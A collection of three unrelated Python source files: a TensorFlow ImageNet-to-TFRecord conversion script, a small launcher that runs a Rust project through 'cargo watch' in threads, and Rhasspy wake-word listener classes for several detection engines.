image_buffer: string, JPEG encoding of RGB image.
height: integer, image height in pixels.
width: integer, image width in pixels.
"""
# Read the image file.
image_data = tf.gfile.FastGFile(filename, 'rb').read()
# Clean the dirty data.
if _is_png(filename):
# 1 image is a PNG.
print('Converting PNG to JPEG for %s' % filename)
image_data = coder.png_to_jpeg(image_data)
elif _is_cmyk(filename):
# 22 JPEG images are in CMYK colorspace.
print('Converting CMYK to RGB for %s' % filename)
image_data = coder.cmyk_to_rgb(image_data)
# Decode the RGB JPEG.
image = coder.decode_jpeg(image_data)
# Check that image converted to RGB
assert len(image.shape) == 3
height = image.shape[0]
width = image.shape[1]
assert image.shape[2] == 3
return image_data, height, width
def _process_image_files_batch(coder, thread_index, ranges, name, filenames,
synsets, labels, humans, bboxes, num_shards):
"""Processes and saves list of images as TFRecord in 1 thread.
Args:
coder: instance of ImageCoder to provide TensorFlow image coding utils.
thread_index: integer, unique batch to run index is within [0, len(ranges)).
ranges: list of pairs of integers specifying ranges of each batches to
analyze in parallel.
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
synsets: list of strings; each string is a unique WordNet ID
labels: list of integer; each integer identifies the ground truth
humans: list of strings; each string is a human-readable label
bboxes: list of bounding boxes for each image. Note that each entry in this
list might contain from 0+ entries corresponding to the number of bounding
box annotations for the image.
num_shards: integer number of shards for this data set.
"""
# Each thread produces N shards where N = int(num_shards / num_threads).
# For instance, if num_shards = 128, and the num_threads = 2, then the first
# thread would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0],
ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in range(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
output_file = os.path.join(FLAGS.output_directory, output_filename)
writer = tf.python_io.TFRecordWriter(output_file)
shard_counter = 0
files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in files_in_shard:
filename = filenames[i]
label = labels[i]
synset = synsets[i]
human = humans[i]
bbox = bboxes[i]
image_buffer, height, width = _process_image(filename, coder)
example = _convert_to_example(filename, image_buffer, label,
synset, human, bbox,
height, width)
writer.write(example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
print('%s [thread %d]: Processed %d of %d images in thread batch.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
print('%s [thread %d]: Wrote %d images to %s' %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
print('%s [thread %d]: Wrote %d images to %d shards.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
def _process_image_files(name, filenames, synsets, labels, humans,
bboxes, num_shards):
"""Process and save list of images as TFRecord of Example protos.
Args:
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
synsets: list of strings; each string is a unique WordNet ID
labels: list of integer; each integer identifies the ground truth
humans: list of strings; each string is a human-readable label
bboxes: list of bounding boxes for each image. Note that each entry in this
list might contain from 0+ entries corresponding to the number of bounding
box annotations for the image.
num_shards: integer number of shards for this data set.
"""
assert len(filenames) == len(synsets)
assert len(filenames) == len(labels)
assert len(filenames) == len(humans)
assert len(filenames) == len(bboxes)
# Break all images into batches with a [ranges[i][0], ranges[i][1]].
spacing = np.linspace(0, len(filenames), FLAGS.num_threads + 1).astype(np.int)
ranges = []
threads = []
for i in range(len(spacing) - 1):
ranges.append([spacing[i], spacing[i+1]])
# Launch a thread for each batch.
print('Launching %d threads for spacings: %s' % (FLAGS.num_threads, ranges))
sys.stdout.flush()
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a generic TensorFlow-based utility for converting all image codings.
coder = ImageCoder()
threads = []
for thread_index in range(len(ranges)):
args = (coder, thread_index, ranges, name, filenames,
synsets, labels, humans, bboxes, num_shards)
t = threading.Thread(target=_process_image_files_batch, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print('%s: Finished writing all %d images in data set.' %
(datetime.now(), len(filenames)))
sys.stdout.flush()
def _find_image_files(data_dir, labels_file):
"""Build a list of all images files and labels in the data set.
Args:
data_dir: string, path to the root directory of images.
Assumes that the ImageNet data set resides in JPEG files located in
the following directory structure.
data_dir/n01440764/ILSVRC2012_val_00000293.JPEG
data_dir/n01440764/ILSVRC2012_val_00000543.JPEG
where 'n01440764' is the unique synset label associated with these images.
labels_file: string, path to the labels file.
The list of valid labels are held in this file. Assumes that the file
contains entries as such:
n01440764
n01443537
n01484850
where each line corresponds to a label expressed as a synset. We map
each synset contained in the file to an integer (based on the alphabetical
ordering) starting with the integer 1 corresponding to the synset
contained in the first line.
The reason we start the integer labels at 1 is to reserve label 0 as an
unused background class.
Returns:
filenames: list of strings; each string is a path to an image file.
synsets: list of strings; each string is a unique WordNet ID.
labels: list of integer; each integer identifies the ground truth.
"""
print('Determining list of input files and labels from %s.' % data_dir)
challenge_synsets = [l.strip() for l in
tf.gfile.FastGFile(labels_file, 'r').readlines()]
labels = []
filenames = []
synsets = []
# Leave label index 0 empty as a background class.
label_index = 1
# Construct the list of JPEG files and labels.
for synset in challenge_synsets:
jpeg_file_path = '%s/%s/*.JPEG' % (data_dir, synset)
matching_files = tf.gfile.Glob(jpeg_file_path)
labels.extend([label_index] * len(matching_files))
synsets.extend([synset] * len(matching_files))
filenames.extend(matching_files)
if not label_index % 100:
print('Finished finding files in %d of %d classes.' % (
label_index, len(challenge_synsets)))
label_index += 1
# Shuffle the ordering of all image files in order to guarantee
# random ordering of the images with respect to label in the
# saved TFRecord files. Make the randomization repeatable.
shuffled_index = list(range(len(filenames)))
random.seed(12345)
random.shuffle(shuffled_index)
filenames = [filenames[i] for i in shuffled_index]
synsets = [synsets[i] for i in shuffled_index]
labels = [labels[i] for i in shuffled_index]
print('Found %d JPEG files across %d labels inside %s.' %
(len(filenames), len(challenge_synsets), data_dir))
return filenames, synsets, labels
def _find_human_readable_labels(synsets, synset_to_human):
"""Build a list of human-readable labels.
Args:
synsets: list of strings; each string is a unique WordNet ID.
synset_to_human: dict of synset to human labels, e.g.,
'n02119022' --> 'red fox, Vulpes vulpes'
Returns:
List of human-readable strings corresponding to each synset.
"""
humans = []
for s in synsets:
assert s in synset_to_human, ('Failed to find: %s' % s)
humans.append(synset_to_human[s])
return humans
def _find_image_bounding_boxes(filenames, image_to_bboxes):
"""Find the bounding boxes for a given image file.
Args:
filenames: list of strings; each string is a path to an image file.
image_to_bboxes: dictionary mapping image file names to a list of
bounding boxes. This list contains 0+ bounding boxes.
Returns:
List of bounding boxes for each image. Note that each entry in this
list might contain from 0+ entries corresponding to the number of bounding
box annotations for the image.
"""
num_image_bbox = 0
bboxes = []
for f in filenames:
basename = os.path.basename(f)
if basename in image_to_bboxes:
bboxes.append(image_to_bboxes[basename])
num_image_bbox += 1
else:
bboxes.append([])
print('Found %d images with bboxes out of %d images' % (
num_image_bbox, len(filenames)))
return bboxes
def _process_dataset(name, directory, num_shards, synset_to_human, image_to_bboxes):
"""Process a complete data set and save it as a TFRecord.
Args:
name: string, unique identifier specifying the data set.
directory: string, root path to the data set.
num_shards: integer number of shards for this data set.
synset_to_human: dict of synset to human labels, e.g.,
'n02119022' --> 'red fox, Vulpes vulpes'
image_to_bboxes: dictionary mapping image file names to a list of
bounding boxes. This list contains 0+ bounding boxes.
"""
filenames, synsets, labels = _find_image_files(directory, FLAGS.labels_file)
humans = _find_human_readable_labels(synsets, synset_to_human)
bboxes = _find_image_bounding_boxes(filenames, image_to_bboxes)
_process_image_files(name, filenames, synsets, labels, humans, bboxes, num_shards)
def _build_synset_lookup(imagenet_metadata_file):
"""Build lookup for synset to human-readable label.
Args:
imagenet_metadata_file: string, path to file containing mapping from
synset to human-readable label.
Assumes each line of the file looks like:
n02119247 black fox
n02119359 silver fox
n02119477 red fox, Vulpes fulva
where each line corresponds to a unique mapping. Note that each line is
formatted as <synset>\t<human readable label>.
Returns:
Dictionary of synset to human labels, such as:
'n02119022' --> 'red fox, Vulpes vulpes'
"""
lines = tf.gfile.FastGFile(imagenet_metadata_file, 'r').readlines()
synset_to_human = {}
for l in lines:
if l:
parts = l.strip().split('\t')
assert len(parts) == 2
synset = parts[0]
human = parts[1]
synset_to_human[synset] = human
return synset_to_human
def _build_bounding_box_lookup(bounding_box_file):
"""Build a lookup from image file to bounding boxes.
Args:
bounding_box_file: string, path to file with bounding boxes annotations.
Assumes each line of the file looks like:
n00007846_64193.JPEG,0.0060,0.2620,0.7545,0.9940
where each line corresponds to one bounding box annotation associated
with an image. Each line can be parsed as:
<JPEG file name>, <xmin>, <ymin>, <xmax>, <ymax>
Note that there might exist mulitple bounding box annotations associated
with an image file. This file is the output of process_bounding_boxes.py.
Returns:
Dictionary mapping image file names to a list of bounding boxes. This list
contains 0+ bounding boxes.
"""
lines = tf.gfile.FastGFile(bounding_box_file, 'r').readlines()
images_to_bboxes = {}
num_bbox = 0
num_image = 0
for l in lines:
if l:
parts = l.split(',')
assert len(parts) == 5, ('Failed to parse: %s' % l)
filename = parts[0]
xmin = float(parts[1])
ymin = float(parts[2])
xmax = float(parts[3])
ymax = float(parts[4])
box = [xmin, ymin, xmax, ymax]
if filename not in images_to_bboxes:
images_to_bboxes[filename] = []
num_image += 1
images_to_bboxes[filename].append(box)
num_bbox += 1
print('Successfully read %d bounding boxes '
'across %d images.' % (num_bbox, num_image))
return images_to_bboxes
def main(unused_argv):
assert not FLAGS.train_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with FLAGS.train_shards')
assert not FLAGS.validation_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with '
'FLAGS.validation_shards')
print('Saving results to %s' % FLAGS.output_directory)
# Build a map from synset to human-readable label.
synset_to_human = _build_synset_lookup(FLAGS.imagenet_metadata_file)
image_to_bboxes = _build_bounding_box_lookup(FLAGS.bounding_box_file)
# Run it!
_process_dataset('validation', FLAGS.validation_directory,
FLAGS.validation_shards, synset_to_human, image_to_bboxes)
_process_dataset('train', FLAGS.train_directory, FLAGS.train_shards,
synset_to_human, image_to_bboxes)
if __name__ == '__main__':
tf.app.run()
|
run.py | import subprocess;
from threading import Thread
# cargo watch -x "run -- -i=529f07b0b1d5d3df52b0440bad708090 -k=192.168.0.1 -p=5602 -t=2dc6bb40e73417bba878d3c8e3e08780 -c=192.168.0.1:5200 -n=5100 -d='d://workstation/expo/rust/fdb/data'"
base_port = 5611;
no_of_actors = 1;
def make_cmd(port):
base_cmd = 'cargo watch -x "run -- -i=529f07b0b1d5d3df52b0440bad708090 -k=192.168.0.1 -p={} -t=2dc6bb40e73417bba878d3c8e3e08780 -c=192.168.0.1:5200 -n=5100 -d=d://workstation/expo/rust/fdb/data"'
return base_cmd.format(port);
def run_cmd(cmd):
print(subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE).stdout.read())
threads = [];
for i in range(0,no_of_actors):
cmd = make_cmd(base_port);
hold = Thread(target=run_cmd,args=(cmd,));
hold.start();
threads.append(hold);
base_port += 1;
for thread in threads:
thread.join();
|
wake.py | """Wake word support."""
import json
import os
import re
import shutil
import struct
import subprocess
import threading
import time
from pathlib import Path
from typing import Any, Dict, Iterable, List, Optional, Type
from rhasspy.actor import RhasspyActor
from rhasspy.events import (
AudioData,
ListenForWakeWord,
MqttMessage,
MqttSubscribe,
StartStreaming,
StopListeningForWakeWord,
StopStreaming,
WakeWordDetected,
WakeWordNotDetected,
PauseListeningForWakeWord,
ResumeListeningForWakeWord,
)
from rhasspy.utils import read_dict
# -----------------------------------------------------------------------------
def get_wake_class(system: str) -> Type[RhasspyActor]:
"""Get type for profile wake system."""
assert system in [
"dummy",
"pocketsphinx",
"hermes",
"snowboy",
"precise",
"porcupine",
"command",
], ("Invalid wake system: %s" % system)
if system == "pocketsphinx":
# Use pocketsphinx locally
return PocketsphinxWakeListener
if system == "hermes":
# Use remote system via MQTT
return HermesWakeListener
if system == "snowboy":
# Use snowboy locally
return SnowboyWakeListener
if system == "precise":
# Use Mycroft Precise locally
return PreciseWakeListener
if system == "porcupine":
# Use Picovoice's porcupine locally
return PorcupineWakeListener
if system == "command":
# Use command-line listener
return CommandWakeListener
# Use dummy listener as a fallback
return DummyWakeListener
# -----------------------------------------------------------------------------
class DummyWakeListener(RhasspyActor):
"""Does nothing"""
def in_started(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in started state."""
pass
# -----------------------------------------------------------------------------
# Pocketsphinx based wake word listener
# https://github.com/cmusphinx/pocketsphinx
# -----------------------------------------------------------------------------,
class PocketsphinxWakeListener(RhasspyActor):
"""Listens for a wake word with pocketsphinx."""
def __init__(self) -> None:
RhasspyActor.__init__(self)
self.receivers: List[RhasspyActor] = []
self.decoder = None
self.decoder_started: bool = False
self.preload = False
self.not_detected = False
self.chunk_size = 960
self.recorder: Optional[RhasspyActor] = None
self.threshold = 0.0
self.keyphrase = ""
def to_started(self, from_state: str) -> None:
"""Transition to started state."""
self.recorder = self.config["recorder"]
self.preload = self.config.get("preload", False)
self.not_detected = self.config.get("not_detected", False)
self.chunk_size = self.profile.get("wake.pocketsphinx.chunk_size", 960)
if self.preload:
with self._lock:
try:
self.load_decoder()
except Exception:
self._logger.exception("loading wake decoder")
self.transition("loaded")
def in_loaded(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in loaded state."""
if isinstance(message, ListenForWakeWord):
self.load_decoder()
self.receivers.append(message.receiver or sender)
self.transition("listening")
if message.record:
self.send(self.recorder, StartStreaming(self.myAddress))
def in_listening(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in listening state."""
if isinstance(message, AudioData):
if not self.decoder_started:
assert self.decoder is not None
self.decoder.start_utt()
self.decoder_started = True
audio_data = message.data
chunk = audio_data[: self.chunk_size]
detected = False
while len(chunk) > 0:
result = self.process_data(chunk)
if result is not None:
detected = True
self._logger.debug("Hotword detected (%s)", self.keyphrase)
detected_msg = WakeWordDetected(
self.keyphrase, audio_data_info=message.info
)
for receiver in self.receivers:
self.send(receiver, detected_msg)
break
audio_data = audio_data[self.chunk_size :]
chunk = audio_data[: self.chunk_size]
# End utterance
if detected and self.decoder_started:
assert self.decoder is not None
self.decoder.end_utt()
self.decoder_started = False
if not detected and self.not_detected:
# Report non-detection
not_detected_msg = WakeWordNotDetected(
self.keyphrase, audio_data_info=message.info
)
for receiver in self.receivers:
self.send(receiver, not_detected_msg)
elif isinstance(message, StopListeningForWakeWord):
if message.clear_all:
self.receivers.clear()
else:
try:
self.receivers.remove(message.receiver or sender)
except ValueError:
pass
if len(self.receivers) == 0:
# End utterance
if self.decoder_started:
assert self.decoder is not None
self.decoder.end_utt()
self.decoder_started = False
if message.record:
self.send(self.recorder, StopStreaming(self.myAddress))
self.transition("loaded")
elif isinstance(message, PauseListeningForWakeWord):
self.transition("paused")
def in_paused(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in paused state."""
if isinstance(message, ResumeListeningForWakeWord):
self.transition("listening")
# -------------------------------------------------------------------------
def process_data(self, data: bytes) -> Optional[str]:
"""Process single chunk of audio."""
assert self.decoder is not None
self.decoder.process_raw(data, False, False)
hyp = self.decoder.hyp()
if hyp:
if self.decoder_started:
self.decoder.end_utt()
self.decoder_started = False
return hyp.hypstr
return None
# -------------------------------------------------------------------------
def load_decoder(self) -> None:
"""Loads speech decoder if not cached."""
if self.decoder is None:
import pocketsphinx
# Load decoder settings (use speech-to-text configuration as a fallback)
hmm_path = self.profile.read_path(
self.profile.get("wake.pocketsphinx.acoustic_model", None)
or self.profile.get("speech_to_text.pocketsphinx.acoustic_model")
)
dict_path = self.profile.read_path(
self.profile.get("wake.pocketsphinx.dictionary", None)
or self.profile.get("speech_to_text.pocketsphinx.dictionary")
)
self.threshold = float(
self.profile.get("wake.pocketsphinx.threshold", 1e-40)
)
self.keyphrase = self.profile.get("wake.pocketsphinx.keyphrase", "")
assert len(self.keyphrase) > 0, "No wake keyphrase"
# Verify that keyphrase words are in dictionary
keyphrase_words = re.split(r"\s+", self.keyphrase)
with open(dict_path, "r") as dict_file:
word_dict = read_dict(dict_file)
dict_upper = self.profile.get("speech_to_text.dictionary_upper", False)
for word in keyphrase_words:
if dict_upper:
word = word.upper()
else:
word = word.lower()
if word not in word_dict:
self._logger.warning("%s not in dictionary", word)
self._logger.debug(
"Loading wake decoder with hmm=%s, dict=%s", hmm_path, dict_path
)
decoder_config = pocketsphinx.Decoder.default_config()
decoder_config.set_string("-hmm", hmm_path)
decoder_config.set_string("-dict", dict_path)
decoder_config.set_string("-keyphrase", self.keyphrase)
decoder_config.set_string("-logfn", "/dev/null")
decoder_config.set_float("-kws_threshold", self.threshold)
mllr_path = self.profile.read_path(
self.profile.get("wake.pocketsphinx.mllr_matrix")
)
if os.path.exists(mllr_path):
self._logger.debug(
"Using tuned MLLR matrix for acoustic model: %s", mllr_path
)
decoder_config.set_string("-mllr", mllr_path)
self.decoder = pocketsphinx.Decoder(decoder_config)
self.decoder_started = False
# -----------------------------------------------------------------------------
# Snowboy wake listener
# https://snowboy.kitt.ai
# -----------------------------------------------------------------------------
class SnowboyWakeListener(RhasspyActor):
"""Listen for wake word with snowboy."""
def __init__(self) -> None:
RhasspyActor.__init__(self)
self.receivers: List[RhasspyActor] = []
self.detectors: List[Any] = []
self.preload = False
self.not_detected = False
self.chunk_size = 960
self.recorder: Optional[RhasspyActor] = None
self.apply_frontend = False
self.models: Dict[str, Any] = {}
self.model_names: List[str] = []
def to_started(self, from_state: str) -> None:
"""Transition to started state."""
self.recorder = self.config["recorder"]
self.preload = self.config.get("preload", False)
self.not_detected = self.config.get("not_detected", False)
self.chunk_size = self.profile.get("wake.snowboy.chunk_size", 960)
if self.preload:
try:
self.load_detectors()
except Exception as e:
self._logger.warning("preload: %s", e)
self.transition("loaded")
def in_loaded(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in loaded state."""
if isinstance(message, ListenForWakeWord):
try:
self.load_detectors()
self.receivers.append(message.receiver or sender)
self.transition("listening")
if message.record:
self.send(self.recorder, StartStreaming(self.myAddress))
except Exception:
self._logger.exception("in_loaded")
def in_listening(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in listening state."""
if isinstance(message, AudioData):
audio_data = message.data
chunk = audio_data[: self.chunk_size]
detected = []
while len(chunk) > 0:
for detector_index, result_index in enumerate(self.process_data(chunk)):
if result_index > 0:
detected.append(detector_index)
if detected:
# Don't process the rest of the audio data if hotword has
# already been detected.
break
audio_data = audio_data[self.chunk_size :]
chunk = audio_data[: self.chunk_size]
# Handle results
if detected:
# Detected
detected_names = [self.model_names[i] for i in detected]
self._logger.debug("Hotword(s) detected: %s", detected_names)
# Send events
for model_name in detected_names:
detected_event = WakeWordDetected(
model_name, audio_data_info=message.info
)
for receiver in self.receivers:
self.send(receiver, detected_event)
elif self.not_detected:
# Not detected
for model_name in self.model_names:
not_detected_event = WakeWordNotDetected(
model_name, audio_data_info=message.info
)
for receiver in self.receivers:
self.send(receiver, not_detected_event)
elif isinstance(message, StopListeningForWakeWord):
if message.clear_all:
self.receivers.clear()
else:
try:
self.receivers.remove(message.receiver or sender)
except ValueError:
pass
if len(self.receivers) == 0:
if message.record:
self.send(self.recorder, StopStreaming(self.myAddress))
self.transition("loaded")
elif isinstance(message, PauseListeningForWakeWord):
self.transition("paused")
def in_paused(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in paused state."""
if isinstance(message, ResumeListeningForWakeWord):
self.transition("listening")
# -------------------------------------------------------------------------
def process_data(self, data: bytes) -> Iterable[int]:
"""Process single chunk of audio data."""
try:
for detector in self.detectors:
# Return is:
# -2 silence
# -1 error
# 0 voice
# n index n-1
yield detector.RunDetection(data)
except Exception:
self._logger.exception("process_data")
# All silences
return [-2] * len(self.detectors)
# -------------------------------------------------------------------------
def load_detectors(self) -> None:
"""Load snowboy detector."""
if not self.detectors:
from snowboy import snowboydetect, snowboydecoder
# Load model names and settings
self.models = self._parse_models()
self.model_names = sorted(list(self.models.keys()))
# Create snowboy detectors
for model_name in self.model_names:
model_settings = self.models[model_name]
model_path = Path(self.profile.read_path(model_name))
assert model_path.is_file(), f"Missing {model_path}"
self._logger.debug("Loading snowboy model from %s", model_path)
detector = snowboydetect.SnowboyDetect(
snowboydecoder.RESOURCE_FILE.encode(), str(model_path).encode()
)
detector.SetSensitivity(str(model_settings["sensitivity"]).encode())
detector.SetAudioGain(float(model_settings["audio_gain"]))
detector.ApplyFrontend(bool(model_settings["apply_frontend"]))
self.detectors.append(detector)
self._logger.debug(
"Loaded snowboy model %s (%s)", model_name, model_settings
)
# -------------------------------------------------------------------------
def _parse_models(self) -> Dict[str, Dict[str, Any]]:
# Default sensitivity
sensitivity: str = str(self.profile.get("wake.snowboy.sensitivity", "0.5"))
# Default audio gain
audio_gain: float = float(self.profile.get("wake.snowboy.audio_gain", "1.0"))
# Default frontend
apply_frontend: bool = self.profile.get("wake.snowboy.apply_frontend", False)
model_names: List[str] = self.profile.get(
"wake.snowboy.model", "snowboy/snowboy.umdl"
).split(",")
model_settings: Dict[str, Dict[str, Any]] = self.profile.get(
"wake.snowboy.model_settings", {}
)
models_dict = {}
for model_name in model_names:
# Add default settings
settings = model_settings.get(model_name, {})
if "sensitivity" not in settings:
settings["sensitivity"] = sensitivity
if "audio_gain" not in settings:
settings["audio_gain"] = audio_gain
if "apply_frontend" not in settings:
settings["apply_frontend"] = apply_frontend
models_dict[model_name] = settings
return models_dict
# -------------------------------------------------------------------------
def get_problems(self) -> Dict[str, Any]:
"""Get problems at startup."""
problems: Dict[str, Any] = {}
try:
# pylint: disable=W0611
from snowboy import snowboydetect, snowboydecoder # noqa: F401
except Exception:
problems[
"snowboy not installed"
] = "The snowboy Python library is not installed. Try pip3 install snowboy"
# Verify that all snowboy models exist
models = self._parse_models()
model_paths = [
Path(self.profile.read_path(model_name)) for model_name in models
]
for model_path in model_paths:
if not model_path.is_file():
problems[
"Missing model"
] = f"Snowboy model could not be loaded from {model_path}"
return problems
# -----------------------------------------------------------------------------
# Mycroft Precise wake listener
# https://github.com/MycroftAI/mycroft-precise
# -----------------------------------------------------------------------------
class PreciseWakeListener(RhasspyActor):
"""Listens for a wake word using Mycroft Precise."""
def __init__(self) -> None:
# pylint: disable=E0401
from precise_runner import ReadWriteStream
RhasspyActor.__init__(self)
self.audio_buffer: bytes = bytes()
self.audio_info: Dict[Any, Any] = {}
self.chunk_delay = 0
self.chunk_size = 2048
self.detected: bool = False
self.engine = None
self.engine_path = ""
self.model_name = ""
self.model_path = ""
self.prediction_sem = threading.Semaphore()
self.preload = False
self.receivers: List[RhasspyActor] = []
self.recorder: Optional[RhasspyActor] = None
self.runner = None
self.send_not_detected = False
self.stream: Optional[ReadWriteStream] = None
def to_started(self, from_state: str) -> None:
"""Transition to started state."""
self.recorder = self.config["recorder"]
self.preload = self.config.get("preload", False)
self.send_not_detected = self.config.get("not_detected", False)
self.chunk_size = self.profile.get("wake.precise.chunk_size", 2048)
self.chunk_delay = self.profile.get("wake.precise.chunk_delay", 0)
if self.preload:
try:
self.load_runner()
except Exception:
pass
self.transition("loaded")
def in_loaded(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in loaded state."""
if isinstance(message, ListenForWakeWord):
try:
self.load_runner()
self.receivers.append(message.receiver or sender)
self.transition("listening")
if message.record:
self.send(self.recorder, StartStreaming(self.myAddress))
except Exception:
self._logger.exception("in_loaded")
def in_listening(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in listening state."""
try:
if isinstance(message, AudioData):
self.audio_info = message.info
self.detected = False
self.audio_buffer += message.data
num_chunks = len(self.audio_buffer) // self.chunk_size
if num_chunks > 0:
assert self.stream is not None
self.prediction_sem = threading.Semaphore()
for _ in range(num_chunks):
chunk = self.audio_buffer[: self.chunk_size]
self.stream.write(chunk)
self.audio_buffer = self.audio_buffer[self.chunk_size :]
if self.send_not_detected:
# Wait for all chunks to finish processing
for _ in range(num_chunks):
self.prediction_sem.acquire(timeout=0.1)
# Wait a little bit for the precise engine to finish processing
time.sleep(self.chunk_delay)
if not self.detected:
# Not detected
not_detected_event = WakeWordNotDetected(
self.model_name, audio_data_info=message.info
)
for receiver in self.receivers:
self.send(receiver, not_detected_event)
elif isinstance(message, StopListeningForWakeWord):
if message.clear_all:
self.receivers.clear()
else:
try:
self.receivers.remove(message.receiver or sender)
except ValueError:
pass
if len(self.receivers) == 0:
if message.record:
self.send(self.recorder, StopStreaming(self.myAddress))
self.transition("loaded")
elif isinstance(message, str):
# Detected
self._logger.debug("Hotword detected (%s)", self.model_name)
detected_event = WakeWordDetected(
self.model_name, audio_data_info=self.audio_info
)
for receiver in self.receivers:
self.send(receiver, detected_event)
elif isinstance(message, PauseListeningForWakeWord):
self.transition("paused")
except Exception:
self._logger.exception("in_listening")
def in_paused(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in paused state."""
if isinstance(message, ResumeListeningForWakeWord):
self.transition("listening")
def to_stopped(self, from_state: str) -> None:
"""Transition to stopped state."""
self.stream = None
if self.runner is not None:
self.runner.stop()
# -------------------------------------------------------------------------
def load_runner(self) -> None:
"""Load precise runner."""
if self.engine is None:
# pylint: disable=E0401
from precise_runner import PreciseEngine
self.model_name = self.profile.get("wake.precise.model", "hey-mycroft-2.pb")
self.model_path = self.profile.read_path(self.model_name)
self.engine_path = os.path.expandvars(
self.profile.get("wake.precise.engine_path", "precise-engine")
)
self._logger.debug("Loading Precise engine at %s", self.engine_path)
self.engine = PreciseEngine(
self.engine_path, self.model_path, chunk_size=self.chunk_size
)
if self.runner is None:
# pylint: disable=E0401
from precise_runner import PreciseRunner, ReadWriteStream
self.stream = ReadWriteStream()
sensitivity = float(self.profile.get("wake.precise.sensitivity", 0.5))
trigger_level = int(self.profile.get("wake.precise.trigger_level", 3))
def on_prediction(prob: float) -> None:
self.prediction_sem.release()
def on_activation() -> None:
self.detected = True
self.send(self.myAddress, "activated")
self.runner = PreciseRunner(
self.engine,
stream=self.stream,
sensitivity=sensitivity,
trigger_level=trigger_level,
on_activation=on_activation,
on_prediction=on_prediction,
)
assert self.runner is not None
self.runner.start()
self._logger.debug(
"Loaded Mycroft Precise (model=%s, sensitivity=%s, trigger_level=%s)",
self.model_path,
sensitivity,
trigger_level,
)
# -------------------------------------------------------------------------
def get_problems(self) -> Dict[str, Any]:
"""Get problems at startup."""
problems: Dict[str, Any] = {}
try:
# pylint: disable=E0401,W0611
from precise_runner import PreciseRunner, ReadWriteStream # noqa: F401
except Exception:
problems[
"precise_runner not installed"
] = "The precise_runner Python library is not installed. Try pip3 install precise_runner"
engine_path = os.path.expandvars(
self.profile.get("wake.precise.engine_path", "precise-engine")
)
if not os.path.exists(engine_path) and not shutil.which(engine_path):
problems[
"Missing precise-engine"
] = 'The Mycroft Precise engine is not installed. Follow the <a href="https://github.com/MycroftAI/mycroft-precise#binary-install">binary install instructions</a>.'
model_name = self.profile.get("wake.precise.model", "hey-mycroft-2.pb")
model_path = self.profile.read_path(model_name)
if not os.path.exists(model_path):
problems[
"Missing model"
] = f"Your Mycroft Precise model could not be loaded from {model_path}"
return problems
# -----------------------------------------------------------------------------
# MQTT-based wake listener (Hermes protocol)
# https://docs.snips.ai/reference/hermes
# -----------------------------------------------------------------------------
class HermesWakeListener(RhasspyActor):
"""Listens for a wake word using MQTT."""
def __init__(self) -> None:
RhasspyActor.__init__(self)
self.receivers: List[RhasspyActor] = []
self.site_ids = "default"
self.wakeword_id = "default"
self.wake_topic = ""
self.mqtt: Optional[RhasspyActor] = None
def to_started(self, from_state: str) -> None:
"""Transition to started state."""
self.mqtt = self.config["mqtt"]
# Subscribe to wake topic
self.site_ids = self.profile.get("mqtt.site_id", "default").split(",")
self.wakeword_id = self.profile.get("wake.hermes.wakeword_id", "default")
self.wake_topic = f"hermes/hotword/{self.wakeword_id}/detected"
self.send(self.mqtt, MqttSubscribe(self.wake_topic))
self.transition("loaded")
def in_loaded(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in loaded state."""
if isinstance(message, ListenForWakeWord):
self.receivers.append(message.receiver or sender)
self.transition("listening")
def in_listening(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in listening state."""
if isinstance(message, MqttMessage):
if message.topic == self.wake_topic:
# Check site ID
payload = json.loads(message.payload.decode())
payload_site_id = payload.get("siteId", "")
if payload_site_id not in self.site_ids:
self._logger.debug(
"Got detected message, but wrong site id (%s)", payload_site_id
)
return
# Pass downstream to receivers
self._logger.debug("Hotword detected (%s)", self.wakeword_id)
result = WakeWordDetected(self.wakeword_id)
for receiver in self.receivers:
self.send(receiver, result)
elif isinstance(message, StopListeningForWakeWord):
if message.clear_all:
self.receivers.clear()
else:
try:
self.receivers.remove(message.receiver or sender)
except ValueError:
pass
if len(self.receivers) == 0:
self.transition("loaded")
elif isinstance(message, PauseListeningForWakeWord):
self.transition("paused")
def in_paused(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in paused state."""
if isinstance(message, ResumeListeningForWakeWord):
self.transition("listening")
# -----------------------------------------------------------------------------
# Porcupine Wake Listener
# https://github.com/Picovoice/Porcupine
# -----------------------------------------------------------------------------
class PorcupineWakeListener(RhasspyActor):
"""Wake word listener that uses picovoice's porcupine library"""
def __init__(self):
RhasspyActor.__init__(self)
self.audio_buffer: bytes = bytes()
self.chunk_format = ""
self.chunk_size = 1024
self.handle = None
self.keyword_paths: List[Path] = []
self.library_path = ""
self.model_path = ""
